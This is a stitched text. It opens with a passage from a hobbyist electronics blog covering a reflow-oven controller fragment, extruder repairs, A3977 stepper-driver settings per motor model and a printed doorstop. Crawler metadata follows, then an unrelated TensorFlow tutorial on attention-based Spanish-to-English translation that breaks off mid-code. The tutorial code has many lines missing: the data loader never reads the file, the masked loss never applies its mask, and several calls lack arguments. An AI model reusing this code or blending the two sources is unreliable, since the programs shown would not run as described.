>= melt_temp: graph.plot([(t,10), (t,temp)], "green") m_state = s_reflow elif m_state == s_reflow: if temp < melt_temp: graph.plot([(t,10), (t,temp)], "green") m_state = s_cool t += 1 hydra.init() except: hydra.init() raiseoven_cook(profile) This is the first board I soldered with it: - All the joints were good. I had a few solder balls and some bridging but that was due to not getting the right amount of paste on each pad. I will be working on a solder paste dispenser soon! I need to do some more testing to see if the arbitrary algorithm will work with large and small boards and with inner planes, etc. It relies on the overshoot being fairly constant, although with leaded solder you have some leeway. I also want to play with PID to see if I can get a more general solution. The problem I see is that PID does not look into the future, so will always overshoot somewhat, which is exactly what you don't want. I think rather than using the angular profile, that is impossible for the oven to follow, I would have to put in a rounded curve, such as the one the oven actually follows now, as the control input. ## Monday, 21 December 2009 ### Reliable extruder at last? ... well only time will tell but I have now fixed all the teething problems on my "no compromise" extruder. The first problem was it was leaking plastic. I simply tightened the thread about another quarter turn while hot. The problem started when I had to dismantle it to replace the first resistor that I damaged. When I put it back together I didn't get it tight enough as it is difficult to judge when full of plastic and hot. The seal relies on the fact that the relatively sharp edge of the stainless steel tube can bite into the softer aluminium. It seems to work when tightened enough. The other problem was that the motor would skip steps in the middle of a build for no apparent reason. It seems the amount of force required to extrude varies wildly for which I have no explanation, but I did find some mechanical issues that were reducing the torque available. I noticed the gear would always be in the same position when the motor skipped. I found that the grub screw was catching on the bearing housing. You would expect it just to grind the PLA away, but PLA is very hard, so it would take a very long time to do so. I increased the clearance around the wheel hub and also around the moving part of the ball bearings. Another issue was that both the worm and the gear were slightly off centre on their shafts, so when the two high points coincided they would bind. The hole in the Meccano gear is slightly bigger than the 4mm shaft it is on, not sure why. The hole I drilled in the worm is 5mm but the MakerBot motors have imperial shafts about 4.75mm, so that was even more eccentric. Added to that was the fact that the motor bracket has a slight warp to it angling the shaft down a little. All these things conspired to make it stiff to turn once per revolution. I fixed it by tightening the bottom motor screw tight and slackening the top two a little. That was enough to reliably extrude PLA. Making the motor holes into slots would make things less critical. Although the extruder was working reliably for PLA I wanted more torque in reserve, so I switched to a higher torque motor more suited to my driver chip. The Lin motor I was using was rated at 0.3Nm holding torque for 2.5A, but my controller can only manage about 1.5A without some better heatsinking. I switched to the Motion Control FL42STH47-1684A-01 which gives 0.43Nm at 1.7A. So at 1.5A I have gone from 0.18Nm to 0.4Nm, i.e. doubled the torque and also got the right shaft diameter to fit the hole I drilled in the worm. The only downside is that it is bigger and heavier, not really an issue on HydraRaptor. To give it a thorough test I printed off a couple of Mendel frame vertices. These take about 2 hours each with 0.4mm filament, 25% fill, double outline at 16mm/s, infill at 32mm/s. Six are needed in total. I still have to test it with HDPE and PCL., I know it works with ABS. ## Sunday, 13 December 2009 ### Motoring on with the A3977 Previously I have blogged about how to set up the Allegro A3977 driver chip to suit a particular motor: - hydraraptor.blogspot.com/2009/07/lessons-from-a3977 hydraraptor.blogspot.com/2009/08/motor-math hydraraptor.blogspot.com/2009/08/mixed-decay-mixed-blessing Most boards I have seen using the A3977 and similar chips just have a current adjustment, with all the other values fixed. Unless you strike lucky this is not going to allow accurate microstepping because the off time and PFD need to be adjusted to suit the motor and supply voltage. A while ago Zach sent me samples of the prototype V3 stepper controller kits and the NEMA17 motors used on the MakerBot. I made up the board using my SMT oven (pizza oven controlled by HydraRaptor, more on that later). It works well, but the initial component values are not optimum for the motor, so I decided to make a test bench from the older prototype board that I have been experimenting with. I RepRapped a chassis for it with a panel to mount some switches to vary the timing components. The chassis is one of the biggest parts I have made, not in volume, but in overall expanse. It warped a little, despite being PLA, heated bed coming soon! The switch on the left must be at least 20 years old and the one on the right more than 40 but they both still work fine. I save all this junk and eventually it comes in handy. I also have potentiometers on V ref and PFD, so together with a bench PSU and a signal generator I can vary every parameter. I knocked up a label on a 2D printer, it's so much easier to make this sort of thing than it was when the switches were born! Zach has updated the board to have four preset potentiometers to make it fully adjustable. There are test points to allow the pots to be set to prescribed values with a multi-meter. Vref and PFD can be measured as a voltage, but the two RT values have to be set by measuring resistance with the power off. My multimeter seems to give accurate readings of these despite them being in circuit. A good tip is to measure the resistance with both polarities and if it reads the same either way round then it is most likely the chip is not affecting the reading. So here is a list of motors and optimised settings: - ## MakerBot Kysan SKU1123029 NEMA17 This is the motor that MakerBot use for the axis drive on the Cupcake, details here. It is actually a 14V motor, so is not ideally suited to being driven from a 12V chopper drive. You normally want the motor voltage to be substantially lower than the supply. You can't run it at its full current because the duty cycle would tend to 100%. With a fixed off-time, the on-time tends towards infinity and the frequency drops into the audio range. In practice I found the maximum current at 12V was 0.3A, any higher and the microstepping waveform was distorted on the leading edge due to the current not being able to rise fast enough. To maintain the sinusoidal waveform at faster step rates requires the current to be lowered further, 0.25A gives a good compromise. It is not a bad idea to under run steppers anyway, otherwise they can get too hot for contact with plastic. I used the minimum values for CT and RT, i.e. 470pF and 12K to keep the chopping frequency as high as possible, so that it is outside of the audio range. Not only is this a good idea to keep it quiet when idling, but also you want it much higher than your stepping frequency, otherwise they beat with each other. The values give a minimum frequency of ~17kHz @ 0.3A and a maximum of ~150kHz on the lowest microstep value. 17kHz is not audible to me, but younger people might be able to hear it. There is still some audible noise at the point in the cycle when both coils have similar currents and so similar high frequencies. The beat frequency, which is the difference of the two, is then in the audio range. It isn't anywhere near as loud as when the chopping is in the audio range though. I can't see any spec for the maximum switching frequency although a couple of parameters are given at less than 50kHz. I suspect 150kHz is a bit on the high side, which would increase switching losses, but with such a low current compared to the rating of the chip I don't think it is a problem. One problem I had initially was that the switching waveform was unstable. It had cycles with a shorter on-time than required, which let the current fall until it then did a long cycle to catch up. The long cycle gave a low frequency that was back in the audio range. I think it was a consequence of the motor needing a very short off-time in order to be able to have the duty cycle nearly 100%. The current hardly falls during the off period, so a little noise due to ringing can trigger it to turn off too early. It is not helped by using the minimum blank time. I fixed it by putting 1uF capacitors across the sense resistors. The PFD value is best set to 100% fast decay with this motor. It works better with a 24V supply. The full 0.4A current can be achieved (but it gets much hotter of course) and it maintains microstepping accuracy at higher step rates than it does on 12V. ## MakerBot Lin SKU4118S-62-07 NEMA17 This is the NEMA17 that MakerBot used to supply. It is at the opposite extreme compared to the one above, i.e. it is a very low voltage motor, only 2V @ 2.5A. As mentioned before, this causes a couple of issues: - 1. The inductance is so low that the ripple current is significant compared to the lowest current microstep, causing positional errors. OK at 2A, but gets worse with lower currents. 2. It is difficult to get 2.5A from the A3977 without it overheating. The PCB layout has to be very good. The datasheet recommends 2oz copper and four layers. 2A is no problem and that is the maximum with the 0.25Ω sense resistors fitted to the board. At 2A the motor runs at about 40°C, so just about OK for use with PLA. The chip gets a lot hotter, about 77°C measured on the ground pins. I used a value of 56K for RT and 2.1V on PFD. To some extent the optimum PFD value depends on how fast you want it to go. ## Motion Control FL42STH47-1684A-01 NEMA17 This is the recommended motor for the Mendel extruder, details here. After buying a couple of these a friend pointed out that Zapp Automation do the same motor with dual shafts for about half the price! This is a high torque motor so it is longer and heavier than the previous two NEMA17s. Electrically it is in the sweet spot for the A3977 with a 12V supply. The A3977 can easily provide the full current and the switching frequency doesn't have wild fluctuations or drop into the audio range. When microstepped at 1.7A it gets to about 43°C but the chip only gets to 56°C. I used 39K for RT and 0V on PFD, i.e. 100% fast decay. I have high hopes for this motor as a replacement for the one above that is in my extruder currently. It should give me almost twice the torque and has the correct sized shaft, i.e. 5mm. The Lin and Kysan motors both have imperial shaft sizes which caught me out as I drilled the worm gear for 5mm thinking NEMA17 specified that, but it must just be the frame dimensions. ## MakerBot Keling KL23H251-24-8B NEMA23 This is the motor I used on my Darwin. It has 8 wires so it can be connected in bipolar serial or parallel. Series has the advantage that the full torque can be achieved with 1.7A which is easily within the range of the A3977. Parallel has one quarter of the inductance so torque will fall off with speed four times slower. To get full torque 3.4A is needed but I found 1A was enough for the X and Y axes. I think Z needs more torque but my z-axis uses different motors so I don't know how much. An RT value of 56K is fine for currents in the range 1-2A. PFD is best at 0v, i.e. 100% fast decay. ## Summary Here is a summary of the motor specifications :- Motor Resistance Max Current Voltage Max Power Holding Torque Inductance LIN 4118S-62-07 0.8 Ohm 2.5 A 2.0 V 10.0 W 0.30 Nm Kysan SKU 1123029 35.0 Ohm 0.4 A 14.0 V 11.2 W 0.26 Nm 44.0 mH Motion Control FL42STH47-1684A-01 1.7 Ohm 1.7 A 2.8 V 9.5 W 0.43 Nm 2.8 mH Keling KL23H251-24-8B Series 3.6 Ohm 1.7 A 6.1 V 20.8 W 1.10 Nm 13.2 mH MakerBot Keling KL23H251-24-8B Parallel 0.9 Ohm 3.4 A 3.1 V 20.8 W 1.10 Nm 3.3 mH Here are my suggested settings :- Motor Current Vref CT RT PFD Kysan SKU 1123029 0.25 – 0.3A 0.5 – 0.6V 470pF 12K 0 LIN 4118S-62-07 1 – 2A 2 – 4V 470pF 56K 2.1V Motion Control FL42STH47-1684A-01 1 – 1.7A 2 – 3.4V 470pF 39K 0 Keling KL23H251-24-8B Parallel 1 – 2A 2 – 4V 470pF 56K 0 ## Friday, 4 December 2009 ### Quality control I RepRapped a doorstop for our new bathroom shower: - It has a 10mm hole most of the way down and a countersink to take a ~5mm wood screw. A 2mm self adhesive felt pad covers the screw hole and acts as a shock absorber. It has a rim around the bottom to prevent it rocking if the base warps or the wall is not flat. To support the bottom of the hole there is a one layer membrane: - I removed it with a 5mm drill: - I was quite proud of it but my wife had something more like this in mind: - I can't print chrome yet, so I will have to go out and buy one, and it has three screws which have to be drilled through the tiles into the wall. The files are on Thingiverse if you prefer function over form.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4322795867919922, "perplexity": 2742.9218487494745}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084893397.98/warc/CC-MAIN-20180124050449-20180124070449-00166.warc.gz"}
https://www.tensorflow.org/text/tutorials/nmt_with_attention?hl=nb-NO
# Neural machine translation with attention This notebook trains a sequence to sequence (seq2seq) model for Spanish to English translation based on Effective Approaches to Attention-based Neural Machine Translation. This is an advanced example that assumes some knowledge of: While this architecture is somewhat outdated it is still a very useful project to work through to get a deeper understanding of attention mechanisms (before going on to Transformers). After training the model in this notebook, you will be able to input a Spanish sentence, such as "¿todavia estan en casa?", and return the English translation: "are you still at home?" The resulting model is exportable as a tf.saved_model, so it can be used in other TensorFlow environments. The translation quality is reasonable for a toy example, but the generated attention plot is perhaps more interesting. This shows which parts of the input sentence has the model's attention while translating: ## Setup pip install tensorflow_text import numpy as np import typing from typing import Any, Tuple import tensorflow as tf from tensorflow.keras.layers.experimental import preprocessing import tensorflow_text as tf_text import matplotlib.pyplot as plt import matplotlib.ticker as ticker This tutorial builds a few layers from scratch, use this variable if you want to switch between the custom and builtin implementations. use_builtins = True This tutorial uses a lot of low level API's where it's easy to get shapes wrong. This class is used to check shapes throughout the tutorial. ## The data We'll use a language dataset provided by http://www.manythings.org/anki/ This dataset contains language translation pairs in the format: May I borrow this book? ¿Puedo tomar prestado este libro? They have a variety of languages available, but we'll use the English-Spanish dataset. 1. Add a start and end token to each sentence. 2. Clean the sentences by removing special characters. 3. Create a word index and reverse word index (dictionaries mapping from word → id and id → word). 4. Pad each sentence to a maximum length. # Download the file import pathlib path_to_zip = tf.keras.utils.get_file( extract=True) path_to_file = pathlib.Path(path_to_zip).parent/'spa-eng/spa.txt' Downloading data from http://storage.googleapis.com/download.tensorflow.org/data/spa-eng.zip 2646016/2638744 [==============================] - 0s 0us/step 2654208/2638744 [==============================] - 0s 0us/step def load_data(path): lines = text.splitlines() pairs = [line.split('\t') for line in lines] inp = [inp for targ, inp in pairs] targ = [targ for targ, inp in pairs] return targ, inp targ, inp = load_data(path_to_file) print(inp[-1]) Si quieres sonar como un hablante nativo, debes estar dispuesto a practicar diciendo la misma frase una y otra vez de la misma manera en que un músico de banjo practica el mismo fraseo una y otra vez hasta que lo puedan tocar correctamente y en el tiempo esperado. print(targ[-1]) If you want to sound like a native speaker, you must be willing to practice saying the same sentence over and over in the same way that banjo players practice the same phrase over and over until they can play it correctly and at the desired tempo. ### Create a tf.data dataset From these arrays of strings you can create a tf.data.Dataset of strings that shuffles and batches them efficiently: BUFFER_SIZE = len(inp) BATCH_SIZE = 64 dataset = tf.data.Dataset.from_tensor_slices((inp, targ)).shuffle(BUFFER_SIZE) dataset = dataset.batch(BATCH_SIZE) for example_input_batch, example_target_batch in dataset.take(1): print(example_input_batch[:5]) print() print(example_target_batch[:5]) break tf.Tensor( [b'La temperatura descendi\xc3\xb3 a cinco grados bajo cero.' b'Tom dijo que \xc3\xa9l nunca dejar\xc3\xada a su esposa.' b'\xc2\xbfEsto es legal?' b'Tom se cay\xc3\xb3.' b'Se est\xc3\xa1 haciendo tarde, as\xc3\xad que es mejor que nos vayamos.'], shape=(5,), dtype=string) tf.Tensor( [b'The temperature fell to five degrees below zero.' b"Tom said he'd never leave his wife." b'Is this legal?' b'Tom fell down.' b"It's getting late, so we'd better get going."], shape=(5,), dtype=string) ### Text preprocessing One of the goals of this tutorial is to build a model that can be exported as a tf.saved_model. To make that exported model useful it should take tf.string inputs, and retrun tf.string outputs: All the text processing happens inside the model. #### Standardization The model is dealing with multilingual text with a limited vocabulary. So it will be important to standardize the input text. The first step is Unicode normalization to split accented characters and replace compatibility characters with their ASCII equivalents. The tensroflow_text package contains a unicode normalize operation: example_text = tf.constant('¿Todavía está en casa?') print(example_text.numpy()) print(tf_text.normalize_utf8(example_text, 'NFKD').numpy()) b'\xc2\xbfTodav\xc3\xada est\xc3\xa1 en casa?' b'\xc2\xbfTodavi\xcc\x81a esta\xcc\x81 en casa?' Unicode normalization will be the first step in the text standardization function: def tf_lower_and_split_punct(text): # Split accecented characters. text = tf_text.normalize_utf8(text, 'NFKD') text = tf.strings.lower(text) # Keep space, a to z, and select punctuation. text = tf.strings.regex_replace(text, '[^ a-z.?!,¿]', '') text = tf.strings.regex_replace(text, '[.?!,¿]', r' \0 ') # Strip whitespace. text = tf.strings.strip(text) text = tf.strings.join(['[START]', text, '[END]'], separator=' ') return text print(example_text.numpy().decode()) print(tf_lower_and_split_punct(example_text).numpy().decode()) ¿Todavía está en casa? [START] ¿ todavia esta en casa ? [END] #### Text Vectorization This standardization function will be wrapped up in a preprocessing.TextVectorization layer which will handle the vocabulary extraction and conversion of input text to sequences of tokens. max_vocab_size = 5000 input_text_processor = preprocessing.TextVectorization( standardize=tf_lower_and_split_punct, max_tokens=max_vocab_size) The TextVectorization layer and many other experimental.preprocessing layers have an adapt method. This method reads one epoch of the training data, and works a lot like Model.fix. This adapt method initializes the layer based on the data. Here it determines the vocabulary: input_text_processor.adapt(inp) # Here are the first 10 words from the vocabulary: input_text_processor.get_vocabulary()[:10] ['', '[UNK]', '[START]', '[END]', '.', 'que', 'de', 'el', 'a', 'no'] That's the Spanish TextVectorization layer, now build and .adapt() the English one: output_text_processor = preprocessing.TextVectorization( standardize=tf_lower_and_split_punct, max_tokens=max_vocab_size) output_text_processor.get_vocabulary()[:10] ['', '[UNK]', '[START]', '[END]', '.', 'the', 'i', 'to', 'you', 'tom'] Now these layers can convert a batch of strings into a batch of token IDs: example_tokens = input_text_processor(example_input_batch) example_tokens[:3, :10] <tf.Tensor: shape=(3, 10), dtype=int64, numpy= array([[ 2, 11, 1593, 1, 8, 313, 2658, 353, 2800, 4], [ 2, 10, 92, 5, 7, 82, 2677, 8, 25, 437], [ 2, 13, 58, 15, 1, 12, 3, 0, 0, 0]])> The get_vocabulary method can be used to convert token IDs back to text: input_vocab = np.array(input_text_processor.get_vocabulary()) tokens = input_vocab[example_tokens[0].numpy()] ' '.join(tokens) '[START] la temperatura [UNK] a cinco grados bajo cero . [END] ' The returned token IDs are zero-padded. This can easily be turned into a mask: plt.subplot(1, 2, 1) plt.pcolormesh(example_tokens) plt.title('Token IDs') plt.subplot(1, 2, 2) plt.pcolormesh(example_tokens != 0) Text(0.5, 1.0, 'Mask') ## The encoder/decoder model The following diagram shows an overview of the model. At each time-step the decoder's output is combined with a weighted sum over the encoded input, to predict the next word. The diagram and formulas are from Luong's paper. Before getting into it define a few constants for the model: embedding_dim = 256 units = 1024 ### The encoder Start by building the encoder, the blue part of the diagram above. The encoder: 1. Takes a list of token IDs (from input_text_processor). 2. Looks up an embedding vector for each token (Using a layers.Embedding). 3. Processes the embeddings into a new sequence (Using a layers.GRU). 4. Returns: • The processed sequence. This will be passed to the attention head. • The internal state. This will be used to initialize the decoder class Encoder(tf.keras.layers.Layer): def __init__(self, input_vocab_size, embedding_dim, enc_units): super(Encoder, self).__init__() self.enc_units = enc_units self.input_vocab_size = input_vocab_size # The embedding layer converts tokens to vectors self.embedding = tf.keras.layers.Embedding(self.input_vocab_size, embedding_dim) # The GRU RNN layer processes those vectors sequentially. self.gru = tf.keras.layers.GRU(self.enc_units, # Return the sequence and state return_sequences=True, return_state=True, recurrent_initializer='glorot_uniform') def call(self, tokens, state=None): shape_checker = ShapeChecker() shape_checker(tokens, ('batch', 's')) # 2. The embedding layer looks up the embedding for each token. vectors = self.embedding(tokens) shape_checker(vectors, ('batch', 's', 'embed_dim')) # 3. The GRU processes the embedding sequence. # output shape: (batch, s, enc_units) # state shape: (batch, enc_units) output, state = self.gru(vectors, initial_state=state) shape_checker(output, ('batch', 's', 'enc_units')) shape_checker(state, ('batch', 'enc_units')) # 4. Returns the new sequence and its state. return output, state Here is how it fits together so far: # Convert the input text to tokens. example_tokens = input_text_processor(example_input_batch) # Encode the input sequence. encoder = Encoder(input_text_processor.vocabulary_size(), embedding_dim, units) example_enc_output, example_enc_state = encoder(example_tokens) print(f'Input batch, shape (batch): {example_input_batch.shape}') print(f'Input batch tokens, shape (batch, s): {example_tokens.shape}') print(f'Encoder output, shape (batch, s, units): {example_enc_output.shape}') print(f'Encoder state, shape (batch, units): {example_enc_state.shape}') Input batch, shape (batch): (64,) Input batch tokens, shape (batch, s): (64, 24) Encoder output, shape (batch, s, units): (64, 24, 1024) Encoder state, shape (batch, units): (64, 1024) The encoder returns its internal state so that its state can be used to initialize the decoder. It's also common for an RNN to return its state so that it can process a sequence over multiple calls. You'll see more of that building the decoder. The decoder uses attention to selectively focus on parts of the input sequence. The attention takes a sequence of vectors as input for each example and returns an "attention" vector for each example. This attention layer is similar to a layers.GlobalAveragePoling1D but the attention layer performs a weighted average. Let's look at how this works: Where: • $s$ is the encoder index. • $t$ is the decoder index. • $\alpha_{ts}$ is the attention weights. • $h_s$ is the sequence of encoder outputs being attended to (the attention "key" and "value" in transformer terminology). • $h_t$ is the the decoder state attending to the sequence (the attention "query" in transformer terminology). • $c_t$ is the resulting context vector. • $a_t$ is the final output combining the "context" and "query". The equations: 1. Calculates the attention weights, $\alpha_{ts}$, as a softmax across the encoder's output sequence. 2. Calculates the context vector as the weighted sum of the encoder outputs. Last is the $score$ function. Its job is to calculate a scalar logit-score for each key-query pair. There are two common approaches: This tutorial uses Bahdanau's additive attention. TensorFlow includes implementations of both as layers.Attention and layers.AdditiveAttention. The class below handles the weight matrices in a pair of layers.Dense layers, and calls the builtin implementation. class BahdanauAttention(tf.keras.layers.Layer): def __init__(self, units): super().__init__() # For Eqn. (4), the Bahdanau attention self.W1 = tf.keras.layers.Dense(units, use_bias=False) self.W2 = tf.keras.layers.Dense(units, use_bias=False) shape_checker = ShapeChecker() shape_checker(query, ('batch', 't', 'query_units')) shape_checker(value, ('batch', 's', 'value_units')) # From Eqn. (4), W1@ht. w1_query = self.W1(query) shape_checker(w1_query, ('batch', 't', 'attn_units')) # From Eqn. (4), W2@hs. w2_key = self.W2(value) shape_checker(w2_key, ('batch', 's', 'attn_units')) context_vector, attention_weights = self.attention( inputs = [w1_query, value, w2_key], return_attention_scores = True, ) shape_checker(context_vector, ('batch', 't', 'value_units')) shape_checker(attention_weights, ('batch', 't', 's')) return context_vector, attention_weights ### Test the Attention layer Create a BahdanauAttention layer: attention_layer = BahdanauAttention(units) This layer takes 3 inputs: • The query: This will be generated by the decoder, later. • The value: This Will be the output of the encoder. • The mask: To exclude the padding, example_tokens != 0 (example_tokens != 0).shape TensorShape([64, 24]) The vectorized implementation of the attention layer lets you pass a batch of sequences of query vectors and a batch of sequence of value vectors. The result is: 1. A batch of sequences of result vectors the size of the queries. 2. A batch attention maps, with size (query_length, value_length). # Later, the decoder will generate this attention query example_attention_query = tf.random.normal(shape=[len(example_tokens), 2, 10]) # Attend to the encoded tokens context_vector, attention_weights = attention_layer( query=example_attention_query, value=example_enc_output, print(f'Attention result shape: (batch_size, query_seq_length, units): {context_vector.shape}') print(f'Attention weights shape: (batch_size, query_seq_length, value_seq_length): {attention_weights.shape}') Attention result shape: (batch_size, query_seq_length, units): (64, 2, 1024) Attention weights shape: (batch_size, query_seq_length, value_seq_length): (64, 2, 24) The attention weights should sum to 1.0 for each sequence. Here are the attention weights across the sequences at t=0: plt.subplot(1, 2, 1) plt.pcolormesh(attention_weights[:, 0, :]) plt.title('Attention weights') plt.subplot(1, 2, 2) plt.pcolormesh(example_tokens != 0) Text(0.5, 1.0, 'Mask') Because of the small-random initialization the attention weights are all close to 1/(sequence_length). If you zoom in on the weights for a single sequence, you can see that there is some small variation that the model can learn to expand, and exploit. attention_weights.shape TensorShape([64, 2, 24]) attention_slice = attention_weights[0, 0].numpy() attention_slice = attention_slice[attention_slice != 0] plt.suptitle('Attention weights for one sequence') plt.figure(figsize=(12, 6)) a1 = plt.subplot(1, 2, 1) plt.bar(range(len(attention_slice)), attention_slice) # freeze the xlim plt.xlim(plt.xlim()) plt.xlabel('Attention weights') a2 = plt.subplot(1, 2, 2) plt.bar(range(len(attention_slice)), attention_slice) plt.xlabel('Attention weights, zoomed') # zoom in top = max(a1.get_ylim()) zoom = 0.85*top a2.set_ylim([0.90*top, top]) a1.plot(a1.get_xlim(), [zoom, zoom], color='k') [<matplotlib.lines.Line2D at 0x7fc2b9997a10>] <Figure size 432x288 with 0 Axes> ### The decoder The decoder's job is to generate predictions for the next output token. 1. The decoder receives the complete encoder output. 2. It uses an RNN to keep track of what it has generated so far. 3. It uses its RNN output as the query to the attention over the encoder's output, producing the context vector. 4. It combines the RNN output and the context vector using Equation 3 (below) to generate the "attention vector". 5. It generates logit predictions for the next token based on the "attention vector". Here is the Decoder class and its initializer. The initializer creates all the necessary layers. class Decoder(tf.keras.layers.Layer): def __init__(self, output_vocab_size, embedding_dim, dec_units): super(Decoder, self).__init__() self.dec_units = dec_units self.output_vocab_size = output_vocab_size self.embedding_dim = embedding_dim # For Step 1. The embedding layer convets token IDs to vectors self.embedding = tf.keras.layers.Embedding(self.output_vocab_size, embedding_dim) # For Step 2. The RNN keeps track of what's been generated so far. self.gru = tf.keras.layers.GRU(self.dec_units, return_sequences=True, return_state=True, recurrent_initializer='glorot_uniform') # For step 3. The RNN output will be the query for the attention layer. self.attention = BahdanauAttention(self.dec_units) # For step 4. Eqn. (3): converting ct to at self.Wc = tf.keras.layers.Dense(dec_units, activation=tf.math.tanh, use_bias=False) # For step 5. This fully connected layer produces the logits for each # output token. self.fc = tf.keras.layers.Dense(self.output_vocab_size) The call method for this layer takes and returns multiple tensors. Organize those into simple container classes: class DecoderInput(typing.NamedTuple): new_tokens: Any enc_output: Any class DecoderOutput(typing.NamedTuple): logits: Any attention_weights: Any Here is the implementation of the call method: def call(self, inputs: DecoderInput, state=None) -> Tuple[DecoderOutput, tf.Tensor]: shape_checker = ShapeChecker() shape_checker(inputs.new_tokens, ('batch', 't')) shape_checker(inputs.enc_output, ('batch', 's', 'enc_units')) if state is not None: shape_checker(state, ('batch', 'dec_units')) # Step 1. Lookup the embeddings vectors = self.embedding(inputs.new_tokens) shape_checker(vectors, ('batch', 't', 'embedding_dim')) # Step 2. Process one step with the RNN rnn_output, state = self.gru(vectors, initial_state=state) shape_checker(rnn_output, ('batch', 't', 'dec_units')) shape_checker(state, ('batch', 'dec_units')) # Step 3. Use the RNN output as the query for the attention over the # encoder output. context_vector, attention_weights = self.attention( shape_checker(context_vector, ('batch', 't', 'dec_units')) shape_checker(attention_weights, ('batch', 't', 's')) # Step 4. Eqn. (3): Join the context_vector and rnn_output # [ct; ht] shape: (batch t, value_units + query_units) context_and_rnn_output = tf.concat([context_vector, rnn_output], axis=-1) # Step 4. Eqn. (3): at = tanh(Wc@[ct; ht]) attention_vector = self.Wc(context_and_rnn_output) shape_checker(attention_vector, ('batch', 't', 'dec_units')) # Step 5. Generate logit predictions: logits = self.fc(attention_vector) shape_checker(logits, ('batch', 't', 'output_vocab_size')) return DecoderOutput(logits, attention_weights), state Decoder.call = call The encoder processes its full input sequence with a single call to its RNN. This implementation of the decoder can do that as well for efficient training. But this tutorial will run the decoder in a loop for a few reasons: • Flexibility: Writing the loop gives you direct control over the training procedure. • Clarity: It's possible to do masking tricks and use layers.RNN, or tfa.seq2seq APIs to pack this all into a single call. But writing it out as a loop may be clearer. Now try using this decoder. decoder = Decoder(output_text_processor.vocabulary_size(), embedding_dim, units) The decoder takes 4 inputs. • new_tokens - The last token generated. Initialize the decoder with the "[START]" token. • enc_output - Generated by the Encoder. • mask - A boolean tensor indicating where tokens != 0 • state - The previous state output from the decoder (the internal state of the decoder's RNN). Pass None to zero-initialize it. The original paper initializes it from the encoder's final RNN state. # Convert the target sequence, and collect the "[START]" tokens example_output_tokens = output_text_processor(example_target_batch) start_index = output_text_processor.get_vocabulary().index('[START]') first_token = tf.constant([[start_index]] * example_output_tokens.shape[0]) # Run the decoder dec_result, dec_state = decoder( inputs = DecoderInput(new_tokens=first_token, enc_output=example_enc_output, state = example_enc_state ) print(f'logits shape: (batch_size, t, output_vocab_size) {dec_result.logits.shape}') print(f'state shape: (batch_size, dec_units) {dec_state.shape}') logits shape: (batch_size, t, output_vocab_size) (64, 1, 5000) state shape: (batch_size, dec_units) (64, 1024) Sample a token according to the logits: sampled_token = tf.random.categorical(dec_result.logits[:, 0, :], num_samples=1) Decode the token as the first word of the output: vocab = np.array(output_text_processor.get_vocabulary()) first_word = vocab[sampled_token.numpy()] first_word[:5] array([['childhood'], ['meditating'], ['this'], ['yell'], ['minister']], dtype='<U16') Now use the decoder to generate a second set of logits. • Pass the same enc_output and mask, these haven't changed. • Pass the sampled token as new_tokens. • Pass the decoder_state the decoder returned last time, so the RNN continues with a memory of where it left off last time. dec_result, dec_state = decoder( DecoderInput(sampled_token, example_enc_output, state=dec_state) sampled_token = tf.random.categorical(dec_result.logits[:, 0, :], num_samples=1) first_word = vocab[sampled_token.numpy()] first_word[:5] array([['passes'], ['runner'], ['worthless'], ['consideration'], ['appearances']], dtype='<U16') ## Training Now that you have all the model components, it's time to start training the model. You'll need: • A loss function and optimizer to perform the optimization. • A training step function defining how to update the model for each input/target batch. • A training loop to drive the training and save checkpoints. ### Define the loss function class MaskedLoss(tf.keras.losses.Loss): def __init__(self): self.loss = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def __call__(self, y_true, y_pred): shape_checker = ShapeChecker() shape_checker(y_true, ('batch', 't')) shape_checker(y_pred, ('batch', 't', 'logits')) # Calculate the loss for each item in the batch. loss = self.loss(y_true, y_pred) shape_checker(loss, ('batch', 't')) mask = tf.cast(y_true != 0, tf.float32) # Return the total. return tf.reduce_sum(loss) ### Implement the training step Start with a model class, the training process will be implemented as the train_step method on this model. See Customizing fit for details. Here the train_step method is a wrapper around the _train_step implementation which will come later. This wrapper includes a switch to turn on and off tf.function compilation, to make debugging easier. class TrainTranslator(tf.keras.Model): def __init__(self, embedding_dim, units, input_text_processor, output_text_processor, use_tf_function=True): super().__init__() # Build the encoder and decoder encoder = Encoder(input_text_processor.vocabulary_size(), embedding_dim, units) decoder = Decoder(output_text_processor.vocabulary_size(), embedding_dim, units) self.encoder = encoder self.decoder = decoder self.input_text_processor = input_text_processor self.output_text_processor = output_text_processor self.use_tf_function = use_tf_function self.shape_checker = ShapeChecker() def train_step(self, inputs): self.shape_checker = ShapeChecker() if self.use_tf_function: return self._tf_train_step(inputs) else: return self._train_step(inputs) Overall the implementation for the Model.train_step method is as follows: 1. Receive a batch of input_text, target_text from the tf.data.Dataset. 2. Convert those raw text inputs to token-embeddings and masks. 3. Run the encoder on the input_tokens to get the encoder_output and encoder_state. 4. Initialize the decoder state and loss. 5. Loop over the target_tokens: 1. Run the decoder one step at a time. 2. Calculate the loss for each step. 3. Accumulate the average loss. 6. Calculate the gradient of the loss and use the optimizer to apply updates to the model's trainable_variables. The _preprocess method, added below, implements steps #1 and #2: def _preprocess(self, input_text, target_text): self.shape_checker(input_text, ('batch',)) self.shape_checker(target_text, ('batch',)) # Convert the text to token IDs input_tokens = self.input_text_processor(input_text) target_tokens = self.output_text_processor(target_text) self.shape_checker(input_tokens, ('batch', 's')) self.shape_checker(target_tokens, ('batch', 't')) TrainTranslator._preprocess = _preprocess The _train_step method, added below, handles the remaining steps except for actually running the decoder: def _train_step(self, inputs): input_text, target_text = inputs max_target_length = tf.shape(target_tokens)[1] # Encode the input enc_output, enc_state = self.encoder(input_tokens) self.shape_checker(enc_output, ('batch', 's', 